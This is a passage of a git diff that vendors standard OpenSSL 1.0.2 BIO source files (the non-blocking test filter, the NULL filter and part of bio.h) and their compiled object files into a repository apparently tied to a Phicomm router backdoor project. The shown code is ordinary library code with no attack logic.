+static int nbiof_read(BIO *h, char *buf, int size);
+static int nbiof_puts(BIO *h, const char *str);
+static int nbiof_gets(BIO *h, char *str, int size);
+static long nbiof_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int nbiof_new(BIO *h);
+static int nbiof_free(BIO *data);
+static long nbiof_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+typedef struct nbio_test_st {
+    /* only set if we sent a 'should retry' error */
+    int lrn;
+    int lwn;
+} NBIO_TEST;
+
+static BIO_METHOD methods_nbiof = {
+    BIO_TYPE_NBIO_TEST,
+    "non-blocking IO test filter",
+    nbiof_write,
+    nbiof_read,
+    nbiof_puts,
+    nbiof_gets,
+    nbiof_ctrl,
+    nbiof_new,
+    nbiof_free,
+    nbiof_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_nbio_test(void)
+{
+    return (&methods_nbiof);
+}
+
+static int nbiof_new(BIO *bi)
+{
+    NBIO_TEST *nt;
+
+    if (!(nt = (NBIO_TEST *)OPENSSL_malloc(sizeof(NBIO_TEST))))
+        return (0);
+    nt->lrn = -1;
+    nt->lwn = -1;
+    bi->ptr = (char *)nt;
+    bi->init = 1;
+    bi->flags = 0;
+    return (1);
+}
+
+static int nbiof_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->ptr != NULL)
+        OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int nbiof_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+#if 1
+    int num;
+    unsigned char n;
+#endif
+
+    if (out == NULL)
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+
+    BIO_clear_retry_flags(b);
+#if 1
+    RAND_pseudo_bytes(&n, 1);
+    num = (n & 0x07);
+
+    if (outl > num)
+        outl = num;
+
+    if (num == 0) {
+        ret = -1;
+        BIO_set_retry_read(b);
+    } else
+#endif
+    {
+        ret = BIO_read(b->next_bio, out, outl);
+        if (ret < 0)
+            BIO_copy_next_retry(b);
+    }
+    return (ret);
+}
+
+static int nbiof_write(BIO *b, const char *in, int inl)
+{
+    NBIO_TEST *nt;
+    int ret = 0;
+    int num;
+    unsigned char n;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+    nt = (NBIO_TEST *)b->ptr;
+
+    BIO_clear_retry_flags(b);
+
+#if 1
+    if (nt->lwn > 0) {
+        num = nt->lwn;
+        nt->lwn = 0;
+    } else {
+        RAND_pseudo_bytes(&n, 1);
+        num = (n & 7);
+    }
+
+    if (inl > num)
+        inl = num;
+
+    if (num == 0) {
+        ret = -1;
+        BIO_set_retry_write(b);
+    } else
+#endif
+    {
+        ret = BIO_write(b->next_bio, in, inl);
+        if (ret < 0) {
+            BIO_copy_next_retry(b);
+            nt->lwn = inl;
+        }
+    }
+    return (ret);
+}
+
+static long nbiof_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+    case BIO_CTRL_DUP:
+        ret = 0L;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long nbiof_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int nbiof_gets(BIO *bp, char *buf, int size)
+{
+    if (bp->next_bio == NULL)
+        return (0);
+    return (BIO_gets(bp->next_bio, buf, size));
+}
+
+static int nbiof_puts(BIO *bp, const char *str)
+{
+    if (bp->next_bio == NULL)
+        return (0);
+    return (BIO_puts(bp->next_bio, str));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_nbio.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_nbio.o
new file mode 100644
index 0000000000000000000000000000000000000000..13c64ef276c58b2131ab6fbf1c6a8ed675b55cdc
GIT binary patch
literal 4664
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_null.c
new file mode 100644
index 0000000..e0c79e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_null.c
@@ -0,0 +1,189 @@
+/* crypto/bio/bf_null.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+/*
+ * BIO_put and BIO_get both add to the digest, BIO_gets returns the digest
+ */
+
+static int nullf_write(BIO *h, const char *buf, int num);
+static int nullf_read(BIO *h, char *buf, int size);
+static int nullf_puts(BIO *h, const char *str);
+static int nullf_gets(BIO *h, char *str, int size);
+static long nullf_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int nullf_new(BIO *h);
+static int nullf_free(BIO *data);
+static long nullf_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+static BIO_METHOD methods_nullf = {
+    BIO_TYPE_NULL_FILTER,
+    "NULL filter",
+    nullf_write,
+    nullf_read,
+    nullf_puts,
+    nullf_gets,
+    nullf_ctrl,
+    nullf_new,
+    nullf_free,
+    nullf_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_null(void)
+{
+    return (&methods_nullf);
+}
+
+static int nullf_new(BIO *bi)
+{
+    bi->init = 1;
+    bi->ptr = NULL;
+    bi->flags = 0;
+    return (1);
+}
+
+static int nullf_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    /*-
+    a->ptr=NULL;
+    a->init=0;
+    a->flags=0;
+    */
+    return (1);
+}
+
+static int nullf_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (out == NULL)
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+    ret = BIO_read(b->next_bio, out, outl);
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static int nullf_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+    ret = BIO_write(b->next_bio, in, inl);
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static long nullf_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+    case BIO_CTRL_DUP:
+        ret = 0L;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+    }
+    return (ret);
+}
+
+static long nullf_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int nullf_gets(BIO *bp, char *buf, int size)
+{
+    if (bp->next_bio == NULL)
+        return (0);
+    return (BIO_gets(bp->next_bio, buf, size));
+}
+
+static int nullf_puts(BIO *bp, const char *str)
+{
+    if (bp->next_bio == NULL)
+        return (0);
+    return (BIO_puts(bp->next_bio, str));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..2e0edfc6a7bd9f6f46c1d88c0a361106520f00fe
GIT binary patch
literal 3816
zcmbW3U1(fI6vt<G6T7zQW-F;yD{_^f70qS07MfbHn@u)*D{E3rqk*d1O>#FW?iY9O
z(k5UVi4876$cryNiVp>!1RsiE2}GJFp@<JYs!!DlMHEq~jpsji&So;*MeKpO=ge=;
zoS8XuXYRd}$&H3XA;A(7FNy6MQz35d-nLWHOo_PY6~Fa9@%Lu-0J>bo!`aLx(7c(o
zpf=E+Tz4*S^?tZ6E6(brL8|)QKcPMOe<5Q1;UAlHn*TV<zr;D(Q#TRqS}#4E=I!Q4
ze~$!YOT9|KS^g^i=7yYu*?VI7ZjV2<eAjK9;1EtT*B^D7ef>e4)prJ+RU+41jIheM
zdE04ru}fF~tzZzfvS2_Y08>7G`J0PJF)*z_oA@*TJ@H!+%90lBgKn&KV{9^)vx?_R
zzU!ghLH30^G~6%F4iCR*9h#hORQ!f@%znX63?z>>WHov5aKcU;c{aeo09~ZwR50i4
z*rcH8tb;|UK>7kDLW{48(1m#DV9&1T8ofy9^SElWlm?S87wNqk8&URtjZL*-C4*U1
zUs5asor}d+!r7Qrjm3vz(V^>v4pI38Z6q~3GRi0X+HUEU*)u9NHT6@u0UwfA@EC*d
z$(U7+MXwLXtd;PHbj3RUL_0}OpgKNrrn<zhTkRYoZBHt4%h}!8D?*V>*+U?##j%tF
zatY3L&Nu4d1Ee9G^CM(~rzPFyClr6(;4drAdm{5sY*O*hl)ub5*=H4h5(y!Z`6Z41
zA@Kl^lv8Ywj>xx81ImnO{(5UfJg8S&c0_2GUyC9>vUjgUMD!lGNCf+C${K-o{NoP%
z(+>Re4*bgw{Ob<<hYtMb4*YlG577=()V{Rd=jmd;(kPYe839EV_q?)-p6e=ercf$P
z7iQkh&-h+Ru{qbTE3?*UnVwsi<xbna=e={jE6T1vU!ASX@roj!&5fsra{2Mm(TU9I
z{OO@|E|VAOljHfFqk+h=V91eR$Z@1|$t`&KVyQ4!4?0(C3$%y}KDqebLclN+I0y59
z6|7o_CglZ!6L)~hovlDV0we){lnQg~Hw64KD$IWbBr*N}3b5n{$!7m<wGU>Tw8n9-
zvj2p}_4%C9xIUkT;$ez`uPw(pPBsMN;!a@B=Mns2jk{z+z#pN){`<9Y^>y)yLUW7?
z3!fcu%!%&@<Q&4B?-@(dZO-=+?s*9Nr-N$id&8XXr9susTvbKN;FhX82Iu>e+c9?(
z7Tl*0=9a9{zlYMyInEmfPpf*(;Jn`V49@wvVsKvXw+81t-!VAf1H!H^l>NdqY2OR<
zJX@YyD%d_9C1KAN{DQEj>vds!RaD@fw3AeYlO$x>r79g>Vb4^{Ww%28DplXL>3?FN
z?$h<5>T{KbUGu6n*Yg)t0CzrL^a^Eu+tg(5Ls`@Zd%gXo34){oB^J@BiBT1Jm+`Kr
zG#{8#y8>`Zb=XT)n9%^sy94IaRKU$I`xoXwa3(SF^TZJIe)}g?%)_L0;qhDdzG~$0
zS>yW-+Z_LU<-qp@$F|r|Iz_r&{;sG*eW(18KkSj2Km1o<s00;V5;#aC&jqUW<ax7x
zi(1%jIgxQj_176})3-tlTWz|ZRluS)U3mV?R>(k1v;UF;QDZ=}|GU(;UH+ETFOQx-
z{MB%O^B$$99rC`~&>LzVxSRW^nEf$~x%UV(r4E$&gKI2D?CaED{hF;Im?mcbe*rb-
B<B<RW

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio.h
new file mode 100644
index 0000000..60083bf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio.h
@@ -0,0 +1,878 @@
+/* crypto/bio/bio.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_BIO_H
+# define HEADER_BIO_H
+
+# include <openssl/e_os2.h>
+
+# ifndef OPENSSL_NO_FP_API
+#  include <stdio.h>
+# endif
+# include <stdarg.h>
+
+# include <openssl/crypto.h>
+
+# ifndef OPENSSL_NO_SCTP
+#  ifndef OPENSSL_SYS_VMS
+#   include <stdint.h>
+#  else
+#   include <inttypes.h>
+#  endif
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* These are the 'types' of BIOs */
+# define BIO_TYPE_NONE           0
+# define BIO_TYPE_MEM            (1|0x0400)
+# define BIO_TYPE_FILE           (2|0x0400)
+
+# define BIO_TYPE_FD             (4|0x0400|0x0100)
+# define BIO_TYPE_SOCKET         (5|0x0400|0x0100)
+# define BIO_TYPE_NULL           (6|0x0400)
+# define BIO_TYPE_SSL            (7|0x0200)
+# define BIO_TYPE_MD             (8|0x0200)/* passive filter */
+# define BIO_TYPE_BUFFER         (9|0x0200)/* filter */
+# define BIO_TYPE_CIPHER         (10|0x0200)/* filter */
+# define BIO_TYPE_BASE64         (11|0x0200)/* filter */
+# define BIO_TYPE_CONNECT        (12|0x0400|0x0100)/* socket - connect */
+# define BIO_TYPE_ACCEPT         (13|0x0400|0x0100)/* socket for accept */
+# define BIO_TYPE_PROXY_CLIENT   (14|0x0200)/* client proxy BIO */
+# define BIO_TYPE_PROXY_SERVER   (15|0x0200)/* server proxy BIO */
+# define BIO_TYPE_NBIO_TEST      (16|0x0200)/* server proxy BIO */
+# define BIO_TYPE_NULL_FILTER    (17|0x0200)
+# define BIO_TYPE_BER            (18|0x0200)/* BER -> bin filter */
+# define BIO_TYPE_BIO            (19|0x0400)/* (half a) BIO pair */
+# define BIO_TYPE_LINEBUFFER     (20|0x0200)/* filter */
+# define BIO_TYPE_DGRAM          (21|0x0400|0x0100)
+# ifndef OPENSSL_NO_SCTP
+#  define BIO_TYPE_DGRAM_SCTP     (24|0x0400|0x0100)
+# endif
+# define BIO_TYPE_ASN1           (22|0x0200)/* filter */
+# define BIO_TYPE_COMP           (23|0x0200)/* filter */
+
+# define BIO_TYPE_DESCRIPTOR     0x0100/* socket, fd, connect or accept */
+# define BIO_TYPE_FILTER         0x0200
+# define BIO_TYPE_SOURCE_SINK    0x0400
+
+/*
+ * BIO_FILENAME_READ|BIO_CLOSE to open or close on free.
+ * BIO_set_fp(in,stdin,BIO_NOCLOSE);
+ */
+# define BIO_NOCLOSE             0x00
+# define BIO_CLOSE               0x01
+
+/*
+ * These are used in the following macros and are passed to BIO_ctrl()
+ */
+# define BIO_CTRL_RESET          1/* opt - rewind/zero etc */
+# define BIO_CTRL_EOF            2/* opt - are we at the eof */
+# define BIO_CTRL_INFO           3/* opt - extra tit-bits */
+# define BIO_CTRL_SET            4/* man - set the 'IO' type */
+# define BIO_CTRL_GET            5/* man - get the 'IO' type */
+# define BIO_CTRL_PUSH           6/* opt - internal, used to signify change */
+# define BIO_CTRL_POP            7/* opt - internal, used to signify change */
+# define BIO_CTRL_GET_CLOSE      8/* man - set the 'close' on free */
+# define BIO_CTRL_SET_CLOSE      9/* man - set the 'close' on free */
+# define BIO_CTRL_PENDING        10/* opt - is their more data buffered */
+# define BIO_CTRL_FLUSH          11/* opt - 'flush' buffered output */
+# define BIO_CTRL_DUP            12/* man - extra stuff for 'duped' BIO */
+# define BIO_CTRL_WPENDING       13/* opt - number of bytes still to write */
+/* callback is int cb(BIO *bio,state,ret); */
+# define BIO_CTRL_SET_CALLBACK   14/* opt - set callback function */
+# define BIO_CTRL_GET_CALLBACK   15/* opt - set callback function */
+
+# define BIO_CTRL_SET_FILENAME   30/* BIO_s_file special */
+
+/* dgram BIO stuff */
+# define BIO_CTRL_DGRAM_CONNECT       31/* BIO dgram special */
+# define BIO_CTRL_DGRAM_SET_CONNECTED 32/* allow for an externally connected
+                                         * socket to be passed in */
+# define BIO_CTRL_DGRAM_SET_RECV_TIMEOUT 33/* setsockopt, essentially */
+# define BIO_CTRL_DGRAM_GET_RECV_TIMEOUT 34/* getsockopt, essentially */
+# define BIO_CTRL_DGRAM_SET_SEND_TIMEOUT 35/* setsockopt, essentially */
+# define BIO_CTRL_DGRAM_GET_SEND_TIMEOUT 36/* getsockopt, essentially */
+
+# define BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP 37/* flag whether the last */
+# define BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP 38/* I/O operation tiemd out */
+
+/* #ifdef IP_MTU_DISCOVER */
+# define BIO_CTRL_DGRAM_MTU_DISCOVER       39/* set DF bit on egress packets */
+/* #endif */
+
+# define BIO_CTRL_DGRAM_QUERY_MTU          40/* as kernel for current MTU */
+# define BIO_CTRL_DGRAM_GET_FALLBACK_MTU   47
+# define BIO_CTRL_DGRAM_GET_MTU            41/* get cached value for MTU */
+# define BIO_CTRL_DGRAM_SET_MTU            42/* set cached value for MTU.
+                                              * want to use this if asking
+                                              * the kernel fails */
+
+# define BIO_CTRL_DGRAM_MTU_EXCEEDED       43/* check whether the MTU was
+                                              * exceed in the previous write
+                                              * operation */
+
+# define BIO_CTRL_DGRAM_GET_PEER           46
+# define BIO_CTRL_DGRAM_SET_PEER           44/* Destination for the data */
+
+# define BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT   45/* Next DTLS handshake timeout
+                                              * to adjust socket timeouts */
+# define BIO_CTRL_DGRAM_SET_DONT_FRAG      48
+
+# define BIO_CTRL_DGRAM_GET_MTU_OVERHEAD   49
+
+# ifndef OPENSSL_NO_SCTP
+/* SCTP stuff */
+#  define BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE    50
+#  define BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY                51
+#  define BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY               52
+#  define BIO_CTRL_DGRAM_SCTP_AUTH_CCS_RCVD               53
+#  define BIO_CTRL_DGRAM_SCTP_GET_SNDINFO         60
+#  define BIO_CTRL_DGRAM_SCTP_SET_SNDINFO         61
+#  define BIO_CTRL_DGRAM_SCTP_GET_RCVINFO         62
+#  define BIO_CTRL_DGRAM_SCTP_SET_RCVINFO         63
+#  define BIO_CTRL_DGRAM_SCTP_GET_PRINFO                  64
+#  define BIO_CTRL_DGRAM_SCTP_SET_PRINFO                  65
+#  define BIO_CTRL_DGRAM_SCTP_SAVE_SHUTDOWN               70
+# endif
+
+/* modifiers */
+# define BIO_FP_READ             0x02
+# define BIO_FP_WRITE            0x04
+# define BIO_FP_APPEND           0x08
+# define BIO_FP_TEXT             0x10
+
+# define BIO_FLAGS_READ          0x01
+# define BIO_FLAGS_WRITE         0x02
+# define BIO_FLAGS_IO_SPECIAL    0x04
+# define BIO_FLAGS_RWS (BIO_FLAGS_READ|BIO_FLAGS_WRITE|BIO_FLAGS_IO_SPECIAL)
+# define BIO_FLAGS_SHOULD_RETRY  0x08
+# ifndef BIO_FLAGS_UPLINK
+/*
+ * "UPLINK" flag denotes file descriptors provided by application. It
+ * defaults to 0, as most platforms don't require UPLINK interface.
+ */
+#  define BIO_FLAGS_UPLINK        0
+# endif
+
+/* Used in BIO_gethostbyname() */
+# define BIO_GHBN_CTRL_HITS              1
+# define BIO_GHBN_CTRL_MISSES            2
+# define BIO_GHBN_CTRL_CACHE_SIZE        3
+# define BIO_GHBN_CTRL_GET_ENTRY         4
+# define BIO_GHBN_CTRL_FLUSH             5
+
+/* Mostly used in the SSL BIO */
+/*-
+ * Not used anymore
+ * #define BIO_FLAGS_PROTOCOL_DELAYED_READ 0x10
+ * #define BIO_FLAGS_PROTOCOL_DELAYED_WRITE 0x20
+ * #define BIO_FLAGS_PROTOCOL_STARTUP   0x40
+ */
+
+# define BIO_FLAGS_BASE64_NO_NL  0x100
+
+/*
